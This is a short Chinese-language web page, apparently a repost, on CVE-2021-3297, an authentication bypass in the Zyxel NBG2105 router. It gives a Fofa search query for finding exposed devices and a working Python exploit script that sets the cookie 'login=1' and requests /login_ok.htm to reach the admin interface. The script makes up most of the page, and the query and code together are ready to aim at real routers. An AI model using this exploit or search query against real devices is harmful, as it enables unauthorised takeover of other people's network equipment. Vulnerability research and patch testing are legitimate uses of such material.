(CVE-2021-3297)Zyxel NBG2105身份驗證繞過漏洞


漏洞描述

Zyxel NBG2105 存在身份驗證繞過,攻擊者通過更改 login參數可用實現后台登陸

Fofa

app="ZyXEL-NBG2105"

POC&EXP

python

import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning


def poc(url):
    exp = url + "/login_ok.htm"

    header = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "cookie":"login=1",
    }
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.get(url=exp, headers=header, verify=False,timeout=10)
        #print(response.text)
        if response.status_code == 200 and "GMT" in response.text:
            print(exp + " 存在Zyxel NBG2105 身份驗證繞過 CVE-2021-3297漏洞!!!")
            print("數據信息如下:")
            print(response.text)
        else:
            print(exp + " 不存在Zyxel NBG2105 身份驗證繞過 CVE-2021-3297漏洞!!!")
    except Exception as e:
        print(exp + "請求失敗!!")


def main():
    url = str(input("請輸入目標url:"))
    poc(url)


if __name__ == "__main__":
    main()

參考連接

https://www.adminxe.com/2219.html


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM